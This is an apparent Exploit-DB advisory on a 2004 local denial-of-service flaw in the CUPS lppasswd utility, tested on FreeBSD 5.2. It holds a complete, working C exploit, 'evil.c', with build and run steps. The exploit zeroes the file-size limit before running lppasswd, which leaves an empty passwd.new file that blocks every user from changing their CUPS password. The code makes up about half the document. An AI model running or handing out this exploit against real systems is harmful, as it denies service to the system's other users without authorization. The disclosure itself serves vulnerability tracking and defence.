Vendor: lppasswd
By: Bartlomiej Sieka
CVSS: 5.5 (MEDIUM)
Denial of Service
CWE:
Product Name: lppasswd
Affected Version From: 1.1.19
Affected Version To: 1.1.22
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: FreeBSD 5.2
Year: 2004

Easy Software Products lppasswd Denial of Service Vulnerability

The Easy Software Products lppasswd utility is prone to a locally exploitable denial-of-service vulnerability. The issue occurs when the program attempts to write a file to the system that will exceed any file size resource limits in place. An unprivileged user with CUPS credentials can set these resource limits and then invoke the application, which will create an empty '/usr/local/etc/cups/passwd.new' file. Subsequent invocations of lppasswd will fail if this file is present. Successful exploitation of this vulnerability will prevent users from changing their CUPS passwords with lppasswd.

Mitigation:

There is no known mitigation for this vulnerability. It is recommended to update to a patched version of the software.

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/12005/info

Easy Software Products lppasswd is prone to a locally exploitable denial of service vulnerability. This issue occurs when the program attempts to write a file to the system that will exceed any file size resource limits in place. This presents a vulnerability since an unprivileged user with CUPS credentials may set these resource limits and then invoke the application. This will create an empty '/usr/local/etc/cups/passwd.new' file. If this file is present, then future invocations of lppasswd will fail.

Successful exploitation will prevent users from changing their CUPS passwords with lppasswd. 

/*
 * evil.c
 * 2004.12.11
 * Bartlomiej Sieka
 *
 * This program executes the lppasswd(1) password changing utility
 * in a way that prevents its further use, i.e. after this program
 * has been executed, all users on the system will be unable to change
 * their CUPS passwords. This is not a documented feature of lppasswd(1)
 * and is certainly unauthorized.
 *
 * This program has been tested with lppasswd(1) versions 1.1.19 and
 * 1.1.22 on FreeBSD 5.2.
 *
 * The recipe:
 * gcc -o evil evil.c
 * ./evil
 * Type in passwords as requested, and voila! This will create an empty
 * file /usr/local/etc/cups/passwd.new. The existence of this file makes
 * lppasswd(1) quit before changing the user's password with the message
 * "lppasswd: Password file busy!".
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <stdio.h>
#include <unistd.h>
extern char **environ;

int main(void){

  char *cmd = "/usr/local/bin/lppasswd";
  char *args[] = { "/usr/local/bin/lppasswd", NULL };

  /* set the file size limit to 0: any write that would make a regular
   * file larger than 0 bytes fails, and the limit is inherited across
   * execve() by the program started below */
  struct rlimit rl;
  rl.rlim_cur = 0;
  rl.rlim_max = 0;
  if (setrlimit(RLIMIT_FSIZE, &rl) != 0) {
    perror("setrlimit");
    return 1;
  }

  /* execute the poor victim; execve() only returns on failure */
  execve(cmd, args, environ);
  perror("execve");
  return 1;
}